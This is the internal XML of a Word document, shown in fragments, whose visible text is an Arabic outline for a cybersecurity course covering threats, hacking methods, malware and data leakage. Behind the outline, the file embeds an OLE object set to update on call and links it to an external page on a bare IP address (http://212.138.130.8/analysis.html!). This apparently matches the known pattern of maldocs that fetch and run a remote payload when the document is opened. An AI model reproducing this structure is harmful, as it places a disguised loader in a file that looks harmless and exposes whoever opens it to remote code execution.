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88" w:rsidRDefault="00CE28BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="sans-serif" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="sans-serif" w:hAnsi="sans-serif" w:cs="sans-serif" w:hint="cs"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl/>
        </w:rPr>
        <w:t>محاورالدورة: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نشأت الأمن السيبرانيوأهميته.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تعريف الأمن السيبراني والهدفمنه.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عناصر الأمنالسيبراني.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التهديداتوأنواعها.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الأساليب المستخدمة في عمليةالاختراق.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البرمجيات الخبيثةوأنواعها.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طرق تسريبالبيانات.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sans-serif" w:eastAsia="sans-serif" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="sans-serif" w:hAnsi="sans-serif" w:cs="sans-serif" w:hint="cs"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl/>
        </w:rPr>
        <w:t>حماية الأجهزة الشخصية وخصوصيةالمنظمات.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C5FC0" w:rsidRDefault="003C5FC0">
      <w:r>
        <w:object w:dxaOrig="15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.5pt;height:9pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1715436330" r:id="rId8" UpdateMode="OnCall">
            <o:LinkType>EnhancedMetaFile</o:LinkType>
            <o:LockedField>false</o:LockedField>
            <o:FieldCodes>\f 0</o:FieldCodes>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003C5F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8BF" w:rsidRDefault="00CE28BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00CE28BF" w:rsidRDefault="00CE2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8BF" w:rsidRDefault="00CE28BF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00CE28BF" w:rsidRDefault="00CE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74"/>
    <w:rsid w:val="002F467F"/>
    <w:rsid w:val="003C5FC0"/>
    <w:rsid w:val="006F4674"/>
    <w:rsid w:val="00A62B3E"/>
    <w:rsid w:val="00CE28BF"/>
    <w:rsid w:val="00DA7A01"/>
    <w:rsid w:val="00EA5288"/>
    <w:rsid w:val="00F833AF"/>
    <w:rsid w:val="0F502EA0"/>
    <w:rsid w:val="28A0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0770"/>
  <w15:docId w15:val="{46CBF1A3-2593-4384-9394-A1616E42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4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oleObject" Target="http://212.138.130.8/analysis.html!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ابراهيم سليمان الغيث</dc:creator>
  <cp:lastModifiedBy>1</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-04T11:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-31T03:19:00Z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8E17F4448B4A40B8AA135A606AA9F99F</vt:lpwstr>
  </property>
</Properties>
</file>